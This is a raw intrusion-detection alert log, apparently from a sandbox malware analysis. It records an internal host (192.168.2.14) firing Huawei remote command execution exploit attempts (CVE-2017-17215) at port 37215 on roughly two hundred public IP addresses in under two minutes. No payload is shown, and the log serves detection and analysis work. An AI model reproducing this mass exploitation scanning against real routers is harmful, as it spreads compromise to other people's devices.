                                                        06/13/24-21:32:54.725301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468437215192.168.2.14197.252.242.3
                                                        06/13/24-21:32:03.277624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081637215192.168.2.14197.245.198.17
                                                        06/13/24-21:32:52.680290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299437215192.168.2.14156.100.185.69
                                                        06/13/24-21:33:13.213781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945637215192.168.2.1441.255.53.8
                                                        06/13/24-21:33:02.914457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909437215192.168.2.14156.94.46.69
                                                        06/13/24-21:32:05.347701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660837215192.168.2.1441.97.97.127
                                                        06/13/24-21:32:32.156616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4151837215192.168.2.14197.144.238.86
                                                        06/13/24-21:33:15.276363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054437215192.168.2.1441.6.195.213
                                                        06/13/24-21:32:21.782986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459437215192.168.2.14197.31.121.111
                                                        06/13/24-21:32:01.240958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022037215192.168.2.1441.69.85.249
                                                        06/13/24-21:32:50.612499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654637215192.168.2.14197.211.8.198
                                                        06/13/24-21:32:17.695228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568637215192.168.2.1441.182.171.204
                                                        06/13/24-21:32:34.192518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470437215192.168.2.14197.109.204.197
                                                        06/13/24-21:32:30.077653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364637215192.168.2.1441.156.115.13
                                                        06/13/24-21:32:32.155498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413637215192.168.2.14156.166.189.225
                                                        06/13/24-21:31:57.090254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055237215192.168.2.14197.18.235.27
                                                        06/13/24-21:31:57.135911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012237215192.168.2.1441.75.255.42
                                                        06/13/24-21:33:07.057286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945837215192.168.2.14156.179.196.8
                                                        06/13/24-21:33:15.255170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416637215192.168.2.14156.135.207.154
                                                        06/13/24-21:33:15.255895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252037215192.168.2.14156.202.5.207
                                                        06/13/24-21:33:17.309768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166837215192.168.2.14197.212.6.153
                                                        06/13/24-21:32:44.475056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956837215192.168.2.14197.199.53.87
                                                        06/13/24-21:32:48.554414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711037215192.168.2.1441.140.198.126
                                                        06/13/24-21:32:56.758606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021837215192.168.2.14197.9.88.245
                                                        06/13/24-21:32:28.027815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197037215192.168.2.14156.156.238.168
                                                        06/13/24-21:33:07.040837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770237215192.168.2.14156.235.241.228
                                                        06/13/24-21:32:40.376520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5796837215192.168.2.14156.1.75.17
                                                        06/13/24-21:32:01.219956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064837215192.168.2.14197.109.98.211
                                                        06/13/24-21:32:09.456575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947037215192.168.2.14197.99.241.203
                                                        06/13/24-21:32:15.609797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5873437215192.168.2.14197.39.138.169
                                                        06/13/24-21:32:32.165159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4592037215192.168.2.14156.163.28.20
                                                        06/13/24-21:32:48.554102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358437215192.168.2.14197.66.242.101
                                                        06/13/24-21:33:04.987243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108037215192.168.2.14156.136.215.187
                                                        06/13/24-21:32:46.524386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962837215192.168.2.14197.147.79.111
                                                        06/13/24-21:32:15.604475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890237215192.168.2.14197.212.93.206
                                                        06/13/24-21:32:23.834362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985837215192.168.2.14156.154.21.120
                                                        06/13/24-21:32:38.318412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377237215192.168.2.14197.164.22.196
                                                        06/13/24-21:32:21.800545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849037215192.168.2.1441.205.142.37
                                                        06/13/24-21:33:05.011317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622837215192.168.2.14156.112.243.68
                                                        06/13/24-21:32:44.476159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692837215192.168.2.14197.225.208.122
                                                        06/13/24-21:32:56.758894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525037215192.168.2.14197.21.249.246
                                                        06/13/24-21:32:13.568782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747837215192.168.2.1441.229.116.226
                                                        06/13/24-21:32:23.941032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058437215192.168.2.14156.141.9.240
                                                        06/13/24-21:33:05.011845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725637215192.168.2.14197.252.31.98
                                                        06/13/24-21:32:09.438917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702237215192.168.2.1441.66.232.151
                                                        06/13/24-21:32:30.074313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408237215192.168.2.1441.177.39.48
                                                        06/13/24-21:32:07.402844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078237215192.168.2.1441.223.147.115
                                                        06/13/24-21:32:07.401335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861637215192.168.2.14197.18.119.111
                                                        06/13/24-21:32:11.506249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727637215192.168.2.14197.250.48.63
                                                        06/13/24-21:32:44.454507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537837215192.168.2.1441.247.244.230
                                                        06/13/24-21:32:09.437506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651837215192.168.2.14156.13.165.93
                                                        06/13/24-21:32:32.152923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149837215192.168.2.1441.185.11.65
                                                        06/13/24-21:32:15.610843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4303037215192.168.2.14197.39.142.42
                                                        06/13/24-21:32:38.323966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633237215192.168.2.1441.191.106.68
                                                        06/13/24-21:32:40.358349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763837215192.168.2.14156.4.185.62
                                                        06/13/24-21:32:36.243280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032437215192.168.2.14156.233.97.117
                                                        06/13/24-21:32:23.933522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5548637215192.168.2.14156.171.149.44
                                                        06/13/24-21:32:34.197711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619237215192.168.2.14156.186.204.84
                                                        06/13/24-21:32:54.726931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923237215192.168.2.1441.114.164.57
                                                        06/13/24-21:32:17.670576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970437215192.168.2.1441.133.172.209
                                                        06/13/24-21:32:44.476213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031637215192.168.2.14156.37.182.32
                                                        06/13/24-21:32:09.458032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027837215192.168.2.1441.249.62.64
                                                        06/13/24-21:31:57.092593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536437215192.168.2.1441.29.87.94
                                                        06/13/24-21:33:09.110876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323437215192.168.2.1441.57.1.179
                                                        06/13/24-21:32:32.152754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628037215192.168.2.14197.110.177.213
                                                        06/13/24-21:32:40.373919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386037215192.168.2.1441.224.192.65
                                                        06/13/24-21:32:11.509419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377237215192.168.2.14156.24.194.18
                                                        06/13/24-21:32:17.679053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6075237215192.168.2.14156.156.170.187
                                                        06/13/24-21:32:19.754428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434837215192.168.2.1441.48.101.234
                                                        06/13/24-21:33:09.107196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302237215192.168.2.14156.66.72.107
                                                        06/13/24-21:32:03.294622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539237215192.168.2.1441.160.163.109
                                                        06/13/24-21:32:21.803501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3796637215192.168.2.14197.43.120.137
                                                        06/13/24-21:33:00.887289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929037215192.168.2.1441.34.93.145
                                                        06/13/24-21:33:09.110574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120637215192.168.2.14197.7.72.186
                                                        06/13/24-21:32:40.353315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833037215192.168.2.14197.151.17.1
                                                        06/13/24-21:32:21.803198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755237215192.168.2.14156.188.199.143
                                                        06/13/24-21:32:34.194574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413037215192.168.2.14197.252.55.166
                                                        06/13/24-21:32:03.307917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480637215192.168.2.14156.150.237.0
                                                        06/13/24-21:32:34.216314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762437215192.168.2.14156.90.103.223
                                                        06/13/24-21:33:13.227792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930437215192.168.2.1441.28.7.250
                                                        06/13/24-21:32:03.309947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550837215192.168.2.14197.54.193.190
                                                        06/13/24-21:32:42.422430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764237215192.168.2.14197.26.80.39
                                                        06/13/24-21:32:19.727971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285037215192.168.2.14197.212.31.255
                                                        06/13/24-21:32:38.316240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296037215192.168.2.14197.179.202.215
                                                        06/13/24-21:33:17.308873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777437215192.168.2.1441.206.160.166
                                                        06/13/24-21:32:56.755802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5872237215192.168.2.14197.121.42.2
                                                        06/13/24-21:32:42.405015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737237215192.168.2.14156.8.169.211
                                                        06/13/24-21:33:13.232136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172837215192.168.2.1441.126.177.56
                                                        06/13/24-21:32:44.454070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5809637215192.168.2.1441.220.72.149
                                                        06/13/24-21:31:57.093255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784037215192.168.2.14156.164.225.185
                                                        06/13/24-21:33:00.870558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360237215192.168.2.14197.48.96.6
                                                        06/13/24-21:32:54.711833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192437215192.168.2.14156.175.243.168
                                                        06/13/24-21:32:56.783823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822437215192.168.2.1441.139.42.235
                                                        06/13/24-21:32:11.487941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643237215192.168.2.1441.27.252.212
                                                        06/13/24-21:32:21.787361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478637215192.168.2.14156.196.154.8
                                                        06/13/24-21:33:02.914322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433237215192.168.2.14156.166.6.27
                                                        06/13/24-21:32:58.838244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930637215192.168.2.1441.203.118.241
                                                        06/13/24-21:32:42.423181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380837215192.168.2.14156.36.157.111
                                                        06/13/24-21:32:25.973640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122637215192.168.2.14156.63.211.25
                                                        06/13/24-21:32:42.403322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5991237215192.168.2.14156.236.113.153
                                                        06/13/24-21:33:07.056296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5911637215192.168.2.1441.48.42.47
                                                        06/13/24-21:32:36.262602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617837215192.168.2.14197.186.114.130
                                                        06/13/24-21:31:57.092388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863437215192.168.2.1441.167.190.75
                                                        06/13/24-21:31:57.093206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004837215192.168.2.14156.195.134.5
                                                        06/13/24-21:33:02.913466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246437215192.168.2.14197.127.127.215
                                                        06/13/24-21:32:30.080046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916437215192.168.2.14156.249.247.71
                                                        06/13/24-21:33:11.160662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257437215192.168.2.14197.103.21.242
                                                        06/13/24-21:32:28.028014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944837215192.168.2.1441.171.225.188
                                                        06/13/24-21:33:09.131208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798037215192.168.2.14156.24.159.162
                                                        06/13/24-21:32:03.295028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770837215192.168.2.14156.199.108.201
                                                        06/13/24-21:32:05.377939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838837215192.168.2.14197.112.213.25
                                                        06/13/24-21:32:15.609607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5548037215192.168.2.14156.35.7.35
                                                        06/13/24-21:32:03.307972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279637215192.168.2.14197.241.250.223
                                                        06/13/24-21:32:48.555155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611037215192.168.2.14156.43.207.94
                                                        06/13/24-21:32:30.127869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587437215192.168.2.14156.165.69.147
                                                        06/13/24-21:31:59.175478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047237215192.168.2.14197.68.100.216
                                                        06/13/24-21:32:44.474737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823037215192.168.2.1441.4.89.163
                                                        06/13/24-21:33:02.914132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729437215192.168.2.1441.84.158.211
                                                        06/13/24-21:32:19.727768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826437215192.168.2.1441.174.200.212
                                                        06/13/24-21:32:58.823507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812837215192.168.2.14197.7.0.148
                                                        06/13/24-21:32:23.832780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119237215192.168.2.14156.183.158.130
                                                        06/13/24-21:32:19.728502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491037215192.168.2.1441.198.119.150
                                                        06/13/24-21:32:32.151300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945637215192.168.2.14156.223.75.97
                                                        06/13/24-21:33:11.176092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362237215192.168.2.14197.80.33.207
                                                        06/13/24-21:32:52.656729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975637215192.168.2.1441.234.93.250
                                                        06/13/24-21:32:52.659003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950037215192.168.2.14197.66.21.27
                                                        06/13/24-21:32:56.754652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243837215192.168.2.14197.165.143.204
                                                        06/13/24-21:32:46.528349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351437215192.168.2.14156.123.218.169
                                                        06/13/24-21:32:05.349673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852237215192.168.2.14197.57.37.89
                                                        06/13/24-21:33:00.886610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615437215192.168.2.14156.51.52.90
                                                        06/13/24-21:32:40.354056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069237215192.168.2.1441.83.52.72
                                                        06/13/24-21:32:56.784431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270637215192.168.2.14197.172.131.143
                                                        06/13/24-21:32:50.612768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443037215192.168.2.14156.217.122.187
                                                        06/13/24-21:33:00.867468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999637215192.168.2.14156.177.92.227
                                                        06/13/24-21:32:34.198959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172437215192.168.2.14156.222.245.94
                                                        06/13/24-21:32:54.711772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243437215192.168.2.14156.183.206.181
                                                        06/13/24-21:32:25.974634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004437215192.168.2.1441.204.29.233
                                                        06/13/24-21:32:44.478035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553637215192.168.2.14156.255.85.213
                                                        06/13/24-21:33:00.885786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3872437215192.168.2.1441.168.85.160
                                                        06/13/24-21:33:15.274137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376637215192.168.2.1441.93.229.103
                                                        06/13/24-21:32:58.842528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732637215192.168.2.14156.48.24.195
                                                        06/13/24-21:32:23.941203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454437215192.168.2.14197.144.114.109
                                                        06/13/24-21:33:05.013829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768437215192.168.2.14156.135.133.115
                                                        06/13/24-21:33:07.043074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844437215192.168.2.1441.231.219.103
                                                        06/13/24-21:33:15.272036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630237215192.168.2.1441.7.55.162
                                                        06/13/24-21:33:02.911539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005237215192.168.2.1441.207.48.129
                                                        06/13/24-21:33:15.273144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660237215192.168.2.1441.73.108.168
                                                        06/13/24-21:32:30.100128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079437215192.168.2.14156.177.45.255
                                                        06/13/24-21:32:32.170094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437237215192.168.2.1441.238.164.55
                                                        06/13/24-21:32:07.403139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650037215192.168.2.14197.105.28.17
                                                        06/13/24-21:32:34.215908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502037215192.168.2.14156.161.137.128
                                                        06/13/24-21:33:15.253652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479237215192.168.2.1441.13.53.51
                                                        06/13/24-21:32:34.195820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994237215192.168.2.14197.200.24.208
                                                        06/13/24-21:33:17.308071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539437215192.168.2.14156.167.17.210
                                                        06/13/24-21:32:30.094845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203437215192.168.2.14197.18.28.239
                                                        06/13/24-21:32:56.756208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949437215192.168.2.14156.184.247.220
                                                        06/13/24-21:32:05.347187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627437215192.168.2.14156.139.239.174
                                                        06/13/24-21:33:13.227544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769437215192.168.2.14197.47.180.27
                                                        06/13/24-21:33:07.042191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082437215192.168.2.1441.253.64.10
                                                        06/13/24-21:31:59.174606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3604837215192.168.2.14156.126.25.234
                                                        06/13/24-21:32:54.710604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298637215192.168.2.1441.166.90.4
                                                        06/13/24-21:32:13.546537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3283437215192.168.2.14197.167.47.11
                                                        06/13/24-21:32:48.552986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528037215192.168.2.14197.12.51.169
                                                        06/13/24-21:32:17.697511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672637215192.168.2.14156.72.46.178
                                                        06/13/24-21:31:59.173998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839837215192.168.2.1441.77.195.149
                                                        06/13/24-21:33:13.214315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727437215192.168.2.14197.182.205.191
                                                        06/13/24-21:32:07.403687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820237215192.168.2.14156.190.83.27
                                                        06/13/24-21:33:15.269095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393837215192.168.2.1441.32.246.245
                                                        06/13/24-21:32:38.302815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.14197.244.231.172
                                                        06/13/24-21:32:54.710760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4008437215192.168.2.1441.18.252.246
                                                        06/13/24-21:33:09.130720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091437215192.168.2.14156.214.186.152
                                                        06/13/24-21:32:42.417599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519437215192.168.2.14197.144.164.38
                                                        06/13/24-21:32:15.609549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142837215192.168.2.14156.157.8.20
                                                        06/13/24-21:33:13.213899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815837215192.168.2.14156.116.108.41
                                                        06/13/24-21:32:05.350335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717637215192.168.2.14197.23.83.254
                                                        06/13/24-21:32:23.935597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393437215192.168.2.1441.243.144.74
                                                        06/13/24-21:32:21.787718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043637215192.168.2.1441.77.153.250
                                                        06/13/24-21:32:44.452956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839637215192.168.2.14156.251.226.251
                                                        06/13/24-21:32:50.614838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765637215192.168.2.1441.70.73.132
                                                        06/13/24-21:32:32.165568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593237215192.168.2.1441.147.236.73
                                                        06/13/24-21:32:38.319916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961637215192.168.2.14197.55.170.166
                                                        06/13/24-21:32:09.438975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591237215192.168.2.1441.242.249.181
                                                        06/13/24-21:32:17.694886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098437215192.168.2.14156.195.233.205
                                                        06/13/24-21:32:32.155609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740037215192.168.2.1441.1.182.147
                                                        06/13/24-21:32:03.273759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793837215192.168.2.14197.22.52.175
                                                        06/13/24-21:32:50.612465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416637215192.168.2.1441.103.123.188
